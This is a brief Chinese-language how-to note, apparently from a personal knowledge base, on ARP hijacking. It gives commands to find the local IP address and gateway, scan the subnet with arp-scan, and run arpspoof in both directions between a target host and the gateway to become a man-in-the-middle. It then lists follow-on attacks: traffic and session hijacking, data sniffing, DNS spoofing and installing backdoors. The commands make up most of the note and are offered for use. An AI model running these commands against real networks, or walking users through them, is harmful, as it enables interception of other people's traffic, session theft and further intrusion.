ARP劫持

ARP劫持

#tech / security #type / howto #status / growing

获取 ip mac 地址信息

[!info] related notes

ip a 得到本机 ip 地址
ip route 得到网关地址
arp-scan --interface=eth0 --localnet 扫描统一子网下主机

ARP劫持(成为中间人)

arpspoof -i eth0 -t 目标IP 网关IP   # 欺骗目标设备
arpspoof -i eth0 -t 网关IP 目标IP   # 欺骗网关(双向劫持)

进一步渗透

  • 流量劫持与中间人攻击(MITM)
  • 会话劫持
  • 数据嗅探
  • DNS 欺骗
  • 安装后门
创建于 2025/1/1 更新于 2026/5/27